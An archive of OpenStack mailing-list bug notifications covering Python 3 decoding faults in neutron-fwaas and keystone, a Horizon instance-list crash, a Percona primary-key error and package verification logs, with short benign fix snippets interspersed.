It is unset in our environment, so we are not using any special module probing. Did nf_conntrack_ipv4 get split out from nf_conntrack in recent kernel upgrades or is it possible that the charm should define a modprobe file if we have the OVS firewall driver configured? To manage notifications about this bug go to: https://bugs.launchpad.net/charm-neutron-openvswitch/+bug/1834213/+subscriptions
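Whether the L3/L4 handlers are actually loaded can be checked from /proc/modules before blaming the flow rules. A minimal sketch; `missing_conntrack_modules` is a hypothetical helper, and the required list is an assumption for pre-4.19 kernels (newer kernels fold the IPv4/IPv6 handlers into nf_conntrack itself):

```python
REQUIRED = ("nf_conntrack", "nf_conntrack_ipv4", "nf_conntrack_ipv6")

def missing_conntrack_modules(proc_modules_text, required=REQUIRED):
    """Given the text of /proc/modules, return the required conntrack
    modules that are not loaded. The module name is the first
    whitespace-separated field on each line."""
    loaded = {
        line.split()[0]
        for line in proc_modules_text.splitlines()
        if line.strip()
    }
    return [mod for mod in required if mod not in loaded]
```

On a live host this would be called as `missing_conntrack_modules(open("/proc/modules").read())`; a non-empty result matches the symptom described above.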
[Yahoo-eng-team] [Bug 1834747] Re: Horizon is unable to show instance list if image_id is not set
Cloud Archive being resolved under bug 1837905 ** Changed in: cloud-archive Status: New => Invalid -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Dashboard (Horizon). https://bugs.launchpad.net/bugs/1834747 Title: Horizon is unable to show instance list if image_id is not set Status in Ubuntu Cloud Archive: Invalid Status in OpenStack Dashboard (Horizon): Fix Released Bug description: My setup contains several instances made from an empty volume with installation from an ISO image. Thus, those instances do not have any source image, but some instances still have image metadata to tweak them. As an example, these are the metadata from one of my boot volumes: volume_image_metadata | {u'hw_qemu_guest_agent': u'yes', u'hw_vif_multiqueue_enabled': u'true', u'os_require_quiesce': u'yes'} Before Stein, I was able to go to project/instances and list every instance in the project, as expected. Since the Stein Horizon release, this page crashes without much detail. After further investigation, I found that the culprit is this piece of code in /usr/horizon/openstack_dashboard/dashboards/project/instances/views.py from line 184:

    boot_volume = volume_dict[instance_volumes[0]['id']]
    if (hasattr(boot_volume, "volume_image_metadata") and
            boot_volume.volume_image_metadata['image_id'] in image_dict):
        instance.image = image_dict[
            boot_volume.volume_image_metadata['image_id']
        ]

I replaced this code with the following to handle the case where there are image metadata but no image_id (volume_image_metadata is a dict, so the key check uses 'in' rather than hasattr):

    boot_volume = volume_dict[instance_volumes[0]['id']]
    if hasattr(boot_volume, "volume_image_metadata"):
        if 'image_id' in boot_volume.volume_image_metadata:
            if boot_volume.volume_image_metadata['image_id'] in image_dict:
                instance.image = image_dict[
                    boot_volume.volume_image_metadata['image_id']
                ]

That corrected this specific bug but I might not be the only one impacted by it...
To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1834747/+subscriptions
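One subtlety behind this bug report: volume_image_metadata is a plain dict, so key presence must be tested with the `in` operator; `hasattr()` on a dict looks at attributes, never at keys. A small illustration with invented sample values:

```python
# Sample boot-volume metadata, shaped like the dict in the bug report.
metadata = {"image_id": "abc123", "hw_qemu_guest_agent": "yes"}

# hasattr() checks object attributes, so it never sees dict keys.
wrong = hasattr(metadata, "image_id")   # always False for a plain dict
# Membership testing is the correct way to probe for a key.
right = "image_id" in metadata
```

This is why a guard written with `hasattr(metadata, "image_id")` would silently skip the lookup for every volume, with or without an image_id.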
[Yahoo-eng-team] [Bug 1832210] Re: fwaas netfilter_log: incorrect decode of log prefix under python 3
This bug was fixed in the package neutron-fwaas - 1:14.0.0-0ubuntu1.1~cloud0 --- neutron-fwaas (1:14.0.0-0ubuntu1.1~cloud0) bionic-stein; urgency=medium . * New update for the Ubuntu Cloud Archive. . neutron-fwaas (1:14.0.0-0ubuntu1.1) disco; urgency=medium . [ Corey Bryant ] * d/gbp.conf: Create stable/stein branch. . [ James Page ] * d/p/netfilter_log-Correct-decode-binary-types.patch: Cherry pick fix to resolve decoding of netfilter log prefix information under Python 3 (LP: #1832210). ** Changed in: cloud-archive/stein Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1832210 Title: fwaas netfilter_log: incorrect decode of log prefix under python 3 Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive rocky series: Fix Committed Status in Ubuntu Cloud Archive stein series: Fix Released Status in Ubuntu Cloud Archive train series: Fix Released Status in neutron: Fix Released Status in neutron-fwaas package in Ubuntu: Fix Released Status in neutron-fwaas source package in Cosmic: Won't Fix Status in neutron-fwaas source package in Disco: Fix Released Status in neutron-fwaas source package in Eoan: Fix Released Bug description: Under Python 3, the prefix of a firewall log message is not correctly decoded "b'10612530182266949194'": 2019-06-10 09:14:34 Unknown cookie packet_in pkt=ethernet(dst='fa:16:3e:c6:58:5e',ethertype=2048,src='fa:16:3e:e0:2c:be')ipv4(csum=51290,dst='10.5.0.10',flags=2,header_length=5,identification=37612,offset=0,option=None,proto=6,src='192.168.21.182',tos=16,total_length=52,ttl=63,version=4)tcp(ack=3151291228,bits=17,csum=23092,dst_port=57776,offset=8,option=[TCPOptionNoOperation(kind=1,length=1), TCPOptionNoOperation(kind=1,length=1), TCPOptionTimestamps(kind=8,length=10,ts_ecr=1574746440,ts_val=482688)],seq=2769917228,src_port=22,urgent=0,window_size=3120) 2019-06-10 09:14:34 
{'prefix': "b'10612530182266949194'", 'msg': "ethernet(dst='fa:16:3e:c6:58:5e',ethertype=2048,src='fa:16:3e:e0:2c:be')ipv4(csum=51290,dst='10.5.0.10',flags=2,header_length=5,identification=37612,offset=0,option=None,proto=6,src='192.168.21.182',tos=16,total_length=52,ttl=63,version=4)tcp(ack=3151291228,bits=17,csum=23092,dst_port=57776,offset=8,option=[TCPOptionNoOperation(kind=1,length=1), TCPOptionNoOperation(kind=1,length=1), TCPOptionTimestamps(kind=8,length=10,ts_ecr=1574746440,ts_val=482688)],seq=2769917228,src_port=22,urgent=0,window_size=3120)"} 2019-06-10 09:14:34 {'0bf81ded-bf94-437d-ad49-063bba9be9bb': [, ]} This results in the firewall log driver not being able to map the message to the associated port and log resources in neutron resulting in the 'unknown cookie packet_in' warning message. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1832210/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
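The stray `b'...'` wrapper around the prefix is the classic Python 3 symptom of formatting raw bytes with str() instead of decoding them, which is what the cherry-picked patch corrects. A minimal illustration of the difference, using the prefix value from the log above:

```python
# Raw prefix bytes as they arrive from the netfilter log socket.
raw_prefix = b"10612530182266949194"

# str() on bytes produces the repr, including the b'' wrapper, so the
# cookie lookup against neutron's string keys never matches.
broken = str(raw_prefix)

# Decoding yields the plain string the log driver expects.
fixed = raw_prefix.decode("utf-8")
```

With the decoded form, the driver can map the prefix back to its port and log resources instead of emitting the 'unknown cookie packet_in' warning.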
[Yahoo-eng-team] [Bug 1832210] Re: fwaas netfilter_log: incorrect decode of log prefix under python 3
# apt-cache policy python3-neutron-fwaas python3-neutron-fwaas: Installed: 1:14.0.0-0ubuntu1.1~cloud0 Candidate: 1:14.0.0-0ubuntu1.1~cloud0 Version table: *** 1:14.0.0-0ubuntu1.1~cloud0 500 500 http://ubuntu-cloud.archive.canonical.com/ubuntu bionic-proposed/stein/main amd64 Packages 100 /var/lib/dpkg/status Sample log messages: Aug 5 09:17:33 juju-ccc3cd-bionic-stein-19 neutron-l3-agent: action=DROP, project_id=8d69996595bf43568a66f6e4edb551b7, log_resource_ids=['719c90e1-e6a4-49cb-a105-74cc86cff67f'], port=79704b31-91a4-42ae-b66f-e356b2811df0, pkt=ethernet(dst='fa:16:3e:97:b3:4f',ethertype=2048,src='fa:16:3e:41:6f:cc')ipv4(csum=20223,dst='192.168.21.92',flags=2,header_length=5,identification=3223,offset=0,option=None,proto=1,src='10.5.0.10',tos=0,total_length=84,ttl=63,version=4)icmp(code=0,csum=63684,data=echo(data=b'#\xf4G]\x00\x00\x00\x00\xc8\xc7\x03\x00\x00\x00\x00\x00\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !"#$%&\'()*+,-./01234567',id=2227,seq=156),type=8) Aug 5 09:17:34 juju-ccc3cd-bionic-stein-19 neutron-l3-agent: action=DROP, project_id=8d69996595bf43568a66f6e4edb551b7, log_resource_ids=['719c90e1-e6a4-49cb-a105-74cc86cff67f'], port=79704b31-91a4-42ae-b66f-e356b2811df0, pkt=ethernet(dst='fa:16:3e:97:b3:4f',ethertype=2048,src='fa:16:3e:41:6f:cc')ipv4(csum=20066,dst='192.168.21.92',flags=2,header_length=5,identification=3380,offset=0,option=None,proto=1,src='10.5.0.10',tos=0,total_length=84,ttl=63,version=4)icmp(code=0,csum=8550,data=echo(data=b'$\xf4G]\x00\x00\x00\x00\x9e%\x04\x00\x00\x00\x00\x00\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !"#$%&\'()*+,-./01234567',id=2227,seq=157),type=8) Aug 5 09:17:35 juju-ccc3cd-bionic-stein-19 neutron-l3-agent: action=ACCEPT, project_id=8d69996595bf43568a66f6e4edb551b7, log_resource_ids=['719c90e1-e6a4-49cb-a105-74cc86cff67f'], port=79704b31-91a4-42ae-b66f-e356b2811df0, 
pkt=ethernet(dst='fa:16:3e:97:b3:4f',ethertype=2048,src='fa:16:3e:41:6f:cc')ipv4(csum=2473,dst='192.168.21.92',flags=2,header_length=5,identification=20992,offset=0,option=None,proto=6,src='10.5.0.10',tos=0,total_length=60,ttl=63,version=4)tcp(ack=0,bits=2,csum=7323,dst_port=22,offset=10,option=[TCPOptionMaximumSegmentSize(kind=2,length=4,max_seg_size=8918), TCPOptionSACKPermitted(kind=4,length=2), TCPOptionTimestamps(kind=8,length=10,ts_ecr=0,ts_val=3542096121), TCPOptionNoOperation(kind=1,length=1), TCPOptionWindowScale(kind=3,length=3,shift_cnt=7)],seq=1338233633,src_port=46744,urgent=0,window_size=26754) ** Tags removed: verification-stein-needed ** Tags added: verification-stein-done ** Changed in: neutron-fwaas (Ubuntu Cosmic) Status: Fix Committed => Won't Fix -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1832210 Title: fwaas netfilter_log: incorrect decode of log prefix under python 3 Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive rocky series: Fix Committed Status in Ubuntu Cloud Archive stein series: Fix Released Status in Ubuntu Cloud Archive train series: Fix Released Status in neutron: Fix Released Status in neutron-fwaas package in Ubuntu: Fix Released Status in neutron-fwaas source package in Cosmic: Won't Fix Status in neutron-fwaas source package in Disco: Fix Released Status in neutron-fwaas source package in Eoan: Fix Released Bug description: Under Python 3, the prefix of a firewall log message is not correctly decoded "b'10612530182266949194'": 2019-06-10 09:14:34 Unknown cookie packet_in 
pkt=ethernet(dst='fa:16:3e:c6:58:5e',ethertype=2048,src='fa:16:3e:e0:2c:be')ipv4(csum=51290,dst='10.5.0.10',flags=2,header_length=5,identification=37612,offset=0,option=None,proto=6,src='192.168.21.182',tos=16,total_length=52,ttl=63,version=4)tcp(ack=3151291228,bits=17,csum=23092,dst_port=57776,offset=8,option=[TCPOptionNoOperation(kind=1,length=1), TCPOptionNoOperation(kind=1,length=1), TCPOptionTimestamps(kind=8,length=10,ts_ecr=1574746440,ts_val=482688)],seq=2769917228,src_port=22,urgent=0,window_size=3120) 2019-06-10 09:14:34 {'prefix': "b'10612530182266949194'", 'msg': "ethernet(dst='fa:16:3e:c6:58:5e',ethertype=2048,src='fa:16:3e:e0:2c:be')ipv4(csum=51290,dst='10.5.0.10',flags=2,header_length=5,identification=37612,offset=0,option=None,proto=6,src='192.168.21.182',tos=16,total_length=52,ttl=63,version=4)tcp(ack=3151291228,bits=17,csum=23092,dst_port=57776,offset=8,option=[TCPOptionNoOperation(kind=1,length=1), TCPOptionNoOperation(kind=1,length=1), TCPOptionTimestamps(kind=8,length=10,ts_ecr=1574746440,ts_val=482688)],seq=2769917228,src_port=22,urgent=0,window_size=3120)"} 2019-06-10 09:14:34 {'0bf81ded-bf94-437d-ad49-063bba9be9bb': [, ]} This results in the firewall log driver not being able to map the message to the associated port and log resources in neutron resulting in the 'unknown cookie pa
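The decode failure above can be reproduced in a few lines. A minimal sketch of the problem and the decode-before-lookup fix (the helper name and cookie value are illustrative, not the actual neutron-fwaas code):

```python
def lookup_log_resource(raw_prefix, cookie_map):
    """Map an NFLOG prefix to its registered cookie.

    Under Python 3 the prefix arrives as bytes; calling str() on it
    yields "b'...'", which never matches the registered string key.
    Decoding first restores the Python 2 behaviour.
    """
    broken_key = str(raw_prefix)  # "b'10612530182266949194'" on py3
    fixed_key = (raw_prefix.decode('utf-8')
                 if isinstance(raw_prefix, bytes) else raw_prefix)
    return cookie_map.get(broken_key), cookie_map.get(fixed_key)

cookies = {'10612530182266949194': 'log-resource-719c90e1'}
missed, found = lookup_log_resource(b'10612530182266949194', cookies)
print(missed, found)  # None log-resource-719c90e1
```

The `None` result is exactly the "Unknown cookie packet_in" path: the driver cannot map the packet back to its port and log resources.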
[Yahoo-eng-team] [Bug 1580588] Re: [RFE] use network's dns_domain to generate dns_assignment
** Changed in: neutron (Ubuntu) Status: New => Won't Fix -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1580588 Title: [RFE] use network's dns_domain to generate dns_assignment Status in neutron: Confirmed Status in neutron package in Ubuntu: Won't Fix Bug description: Problem: currently, the port's dns_assignment is generated by combining the dns_name and conf.dns_domain even if the dns_domain of port's network is given. expectation: generate the dns_assignment according to the dns_domain of port's network, which will scope the dnsname by network instead of each neutron deployment. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1580588/+subscriptions
[Yahoo-eng-team] [Bug 1832265] Re: py3: inconsistent encoding of token fields
Ubuntu SRU information: [Impact] Due to inconsistent decode/encode of bytestrings under py3, keystone ldap integration is broken when keystone is run under Python 3. [Test Case] Deploy keystone Configure to use LDAP [Regression Potential] The proposed patch has been +2'ed by upstream and validated as resolving this issue by the original bug reporter; the change simply ensures that any encoded values are decoded before use. ** Changed in: cloud-archive/stein Status: New => Triaged ** Changed in: cloud-archive/rocky Status: New => Triaged ** Changed in: keystone (Ubuntu Cosmic) Status: Triaged => Won't Fix ** Changed in: cloud-archive/train Importance: Undecided => High ** Changed in: cloud-archive/stein Importance: Undecided => High ** Changed in: cloud-archive/rocky Importance: Undecided => High -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Identity (keystone). https://bugs.launchpad.net/bugs/1832265 Title: py3: inconsistent encoding of token fields Status in OpenStack Keystone LDAP integration: Invalid Status in Ubuntu Cloud Archive: Triaged Status in Ubuntu Cloud Archive rocky series: Triaged Status in Ubuntu Cloud Archive stein series: Triaged Status in Ubuntu Cloud Archive train series: Fix Released Status in OpenStack Identity (keystone): In Progress Status in keystone package in Ubuntu: Fix Released Status in keystone source package in Cosmic: Won't Fix Status in keystone source package in Disco: Triaged Bug description: When using an LDAP domain user on a bionic-rocky cloud within horizon, we are unable to see the projects listed in the project selection drop-down, and are unable to query resources from any projects to which we are assigned the role Member. 
It appears that the following log entries in keystone may be helpful to troubleshooting this issue: (keystone.middleware.auth): 2019-06-10 19:47:02,700 DEBUG RBAC: auth_context: {'trust_id': None, 'trustor_id': None, 'trustee_id': None, 'domain_id': None, 'domain_name': None, 'group_ids': [], 'token': , 'user_id': b'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4', 'user_domain_id': '997b3e91271140feb1635eefba7c65a1', 'system_scope': None, 'project_id': None, 'project_domain_id': None, 'roles': [], 'is_admin_project': True, 'service_user_id': None, 'service_user_domain_id': None, 'service_project_id': None, 'service_project_domain_id': None, 'service_roles': []} (keystone.server.flask.application): 2019-06-10 19:47:02,700 DEBUG Dispatching request to legacy mapper: /v3/users (keystone.server.flask.application): 2019-06-10 19:47:02,700 DEBUG SCRIPT_NAME: `/v3`, PATH_INFO: `/users/d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4/projects` (routes.middleware): 2019-06-10 19:47:02,700 DEBUG Matched GET /users/d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4/projects (routes.middleware): 2019-06-10 19:47:02,700 DEBUG Route path: '/users/{user_id}/projects', defaults: {'action': 'list_user_projects', 'controller': } (routes.middleware): 2019-06-10 19:47:02,700 DEBUG Match dict: {'user_id': 'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4', 'action': 'list_user_projects', 'controller': } (keystone.common.wsgi): 2019-06-10 19:47:02,700 INFO GET https://keystone.mysite:5000/v3/users/d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4/projects (keystone.common.controller): 2019-06-10 19:47:02,700 DEBUG RBAC: Adding query filter params () (keystone.common.authorization): 2019-06-10 19:47:02,700 DEBUG RBAC: Authorizing identity:list_user_projects(user_id=d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4) (keystone.policy.backends.rules): 2019-06-10 19:47:02,701 DEBUG enforce 
identity:list_user_projects: {'trust_id': None, 'trustor_id': None, 'trustee_id': None, 'domain_id': None, 'domain_name': None, 'group_ids': [], 'token': , 'user_id': b'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4', 'user_domain_id': '997b3e91271140feb1635eefba7c65a1', 'system_scope': None, 'project_id': None, 'project_domain_id': None, 'roles': [], 'is_admin_project': True, 'service_user_id': None, 'service_user_domain_id': None, 'service_project_id': None, 'service_project_domain_id': None, 'service_roles': []} (keystone.common.wsgi): 2019-06-10 19:47:02,702 WARNING You are not authorized to perform the requested action: identity:list_user_projects. It actually appears elsewhere in the keystone.log that there is a string which has encapsulated bytecode data in it (or vice versa). (keystone.common.wsgi): 2019-06-10 19:46:59,019 INFO POST https://keystone.mysite:5000/v3/auth/tokens (sqlalchemy.orm.path_registry): 2019-06-10 19:46:59,021 DEBUG set 'memoized_setups' on path 'EntityRegistry((,))' to '{}' (sqlalchemy.pool.QueuePool): 2019-06-10 19:46:59,0
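The mixed str/bytes `user_id` visible in the auth_context above is the kind of value the fix normalises: the token carries bytes while the URL path always yields str, so the RBAC comparison fails under Python 3. A hedged sketch of the decode-before-use idea (the helper name is illustrative):

```python
def to_text(value, encoding='utf-8'):
    """Normalise a possibly-bytes identity field to text so that
    comparisons against URL path components (always str) succeed."""
    if isinstance(value, bytes):
        return value.decode(encoding)
    return value

auth_context = {
    'user_id': b'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4',
    'user_domain_id': '997b3e91271140feb1635eefba7c65a1',
}
normalized = {k: to_text(v) for k, v in auth_context.items()}

# The policy check compares the token's user_id with the one parsed
# from the request path; with bytes on one side this is always False.
path_user_id = 'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4'
print(auth_context['user_id'] == path_user_id)  # False
print(normalized['user_id'] == path_user_id)    # True
```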
[Yahoo-eng-team] [Bug 1832265] Re: py3: inconsistent encoding of token fields
** Also affects: cloud-archive/train Importance: Undecided Status: New ** Also affects: cloud-archive/rocky Importance: Undecided Status: New ** Also affects: cloud-archive/stein Importance: Undecided Status: New ** Changed in: cloud-archive/train Status: New => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Identity (keystone). https://bugs.launchpad.net/bugs/1832265 Title: py3: inconsistent encoding of token fields Status in OpenStack Keystone LDAP integration: Invalid Status in Ubuntu Cloud Archive: New Status in Ubuntu Cloud Archive rocky series: New Status in Ubuntu Cloud Archive stein series: New Status in Ubuntu Cloud Archive train series: Fix Released Status in OpenStack Identity (keystone): In Progress Status in keystone package in Ubuntu: Fix Released Status in keystone source package in Cosmic: Triaged Status in keystone source package in Disco: Triaged Bug description: When using an LDAP domain user on a bionic-rocky cloud within horizon, we are unable to see the projects listed in the project selection drop-down, and are unable to query resources from any projects to which we are assigned the role Member. 
It appears that the following log entries in keystone may be helpful to troubleshooting this issue: (keystone.middleware.auth): 2019-06-10 19:47:02,700 DEBUG RBAC: auth_context: {'trust_id': None, 'trustor_id': None, 'trustee_id': None, 'domain_id': None, 'domain_name': None, 'group_ids': [], 'token': , 'user_id': b'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4', 'user_domain_id': '997b3e91271140feb1635eefba7c65a1', 'system_scope': None, 'project_id': None, 'project_domain_id': None, 'roles': [], 'is_admin_project': True, 'service_user_id': None, 'service_user_domain_id': None, 'service_project_id': None, 'service_project_domain_id': None, 'service_roles': []} (keystone.server.flask.application): 2019-06-10 19:47:02,700 DEBUG Dispatching request to legacy mapper: /v3/users (keystone.server.flask.application): 2019-06-10 19:47:02,700 DEBUG SCRIPT_NAME: `/v3`, PATH_INFO: `/users/d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4/projects` (routes.middleware): 2019-06-10 19:47:02,700 DEBUG Matched GET /users/d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4/projects (routes.middleware): 2019-06-10 19:47:02,700 DEBUG Route path: '/users/{user_id}/projects', defaults: {'action': 'list_user_projects', 'controller': } (routes.middleware): 2019-06-10 19:47:02,700 DEBUG Match dict: {'user_id': 'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4', 'action': 'list_user_projects', 'controller': } (keystone.common.wsgi): 2019-06-10 19:47:02,700 INFO GET https://keystone.mysite:5000/v3/users/d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4/projects (keystone.common.controller): 2019-06-10 19:47:02,700 DEBUG RBAC: Adding query filter params () (keystone.common.authorization): 2019-06-10 19:47:02,700 DEBUG RBAC: Authorizing identity:list_user_projects(user_id=d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4) (keystone.policy.backends.rules): 2019-06-10 19:47:02,701 DEBUG enforce 
identity:list_user_projects: {'trust_id': None, 'trustor_id': None, 'trustee_id': None, 'domain_id': None, 'domain_name': None, 'group_ids': [], 'token': , 'user_id': b'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4', 'user_domain_id': '997b3e91271140feb1635eefba7c65a1', 'system_scope': None, 'project_id': None, 'project_domain_id': None, 'roles': [], 'is_admin_project': True, 'service_user_id': None, 'service_user_domain_id': None, 'service_project_id': None, 'service_project_domain_id': None, 'service_roles': []} (keystone.common.wsgi): 2019-06-10 19:47:02,702 WARNING You are not authorized to perform the requested action: identity:list_user_projects. It actually appears elsewhere in the keystone.log that there is a string which has encapsulated bytecode data in it (or vice versa). (keystone.common.wsgi): 2019-06-10 19:46:59,019 INFO POST https://keystone.mysite:5000/v3/auth/tokens (sqlalchemy.orm.path_registry): 2019-06-10 19:46:59,021 DEBUG set 'memoized_setups' on path 'EntityRegistry((,))' to '{}' (sqlalchemy.pool.QueuePool): 2019-06-10 19:46:59,021 DEBUG Connection checked out from pool (sqlalchemy.pool.QueuePool): 2019-06-10 19:46:59,024 DEBUG Connection being returned to pool (sqlalchemy.pool.QueuePool): 2019-06-10 19:46:59,024 DEBUG Connection rollback-on-return, via agent (keystone.auth.core): 2019-06-10 19:46:59,025 DEBUG MFA Rules not processed for user `b'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4'`. Rule list: `[]` (Enabled: `True`). (keystone.common.wsgi): 2019-06-10 19:46:59,025 ERROR a bytes-like object is required, not 'str' Trace
[Yahoo-eng-team] [Bug 1831986] Re: fwaas_v2 - unable to associate port with firewall (PXC strict mode)
As Cosmic reaches EOL today, this fix is not being targeted for it. ** Also affects: cloud-archive/stein Importance: Undecided Status: New ** Also affects: cloud-archive/rocky Importance: Undecided Status: New ** Also affects: cloud-archive/train Importance: Undecided Status: New ** Also affects: neutron-fwaas (Ubuntu Eoan) Importance: Undecided Status: New ** Also affects: neutron-fwaas (Ubuntu Disco) Importance: Undecided Status: New -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1831986 Title: fwaas_v2 - unable to associate port with firewall (PXC strict mode) Status in Ubuntu Cloud Archive: New Status in Ubuntu Cloud Archive rocky series: New Status in Ubuntu Cloud Archive stein series: New Status in Ubuntu Cloud Archive train series: New Status in neutron: In Progress Status in neutron-fwaas package in Ubuntu: New Status in neutron-fwaas source package in Disco: New Status in neutron-fwaas source package in Eoan: New Bug description: Impacts both Stein and Rocky (although Rocky does not enable v2 just yet). 
542 a9761fa9124740028d0c1d70ff7aa542] DBAPIError exception wrapped from (pymysql.err.InternalError) (1105, 'Percona-XtraDB-Cluster prohibits use of DML command on a table (neutron.firewall_group_port_associations_v2) without an explicit primary key with pxc_strict_mode = ENFORCING or MASTER') [SQL: 'DELETE FROM firewall_group_port_associations_v2 WHERE firewall_group_port_associations_v2.firewall_group_id = %(firewall_group_id_1)s'] [parameters: {'firewall_group_id_1': '85a277d0-ebaf-4a5d-9d45-6a74b8f54372'}] (Background on this error at: http://sqlalche.me/e/2j85): pymysql.err.InternalError: (1105, 'Percona-XtraDB-Cluster prohibits use of DML command on a table (neutron.firewall_group_port_associations_v2) without an explicit primary key with pxc_strict_mode = ENFORCING or MASTER') 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters Traceback (most recent call last): 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/sqlalchemy/engine/base.py", line 1193, in _execute_context 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters context) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/sqlalchemy/engine/default.py", line 509, in do_execute 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters cursor.execute(statement, parameters) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/cursors.py", line 165, in execute 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters result = self._query(query) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/cursors.py", line 321, in _query 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters conn.query(q) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 
860, in query 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters self._affected_rows = self._read_query_result(unbuffered=unbuffered) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 1061, in _read_query_result 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters result.read() 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 1349, in read 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters first_packet = self.connection._read_packet() 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 1018, in _read_packet 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters packet.check_error() 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 384, in check_error 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters err.raise_mysql_exception(self._data) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/err.py", line 107, in raise_mysql_exception 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters raise errorclass(errno, errval) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters pymysql.err.InternalError: (1105, 'Percona-XtraDB-Cluster prohibits use of DML command on a table (neutron.firewall_group_port_associations_v2) without an explicit primary
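PXC's `pxc_strict_mode = ENFORCING` rejects any DML against a table that lacks an explicit primary key, so the durable fix is schema-level rather than query-level. A hedged sketch of the kind of DDL involved (the `port_id` column name is assumed from the table's purpose, not taken from the actual migration):

```sql
-- Give the association table an explicit composite primary key so that
-- Percona XtraDB Cluster accepts DELETEs against it in strict mode.
ALTER TABLE firewall_group_port_associations_v2
    ADD PRIMARY KEY (firewall_group_id, port_id);
```

With the key in place, the `DELETE FROM firewall_group_port_associations_v2 WHERE firewall_group_id = ...` statement from the traceback no longer trips error 1105.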
[Yahoo-eng-team] [Bug 1826523] Re: libvirtError exceptions during volume attach leave volume connected to host
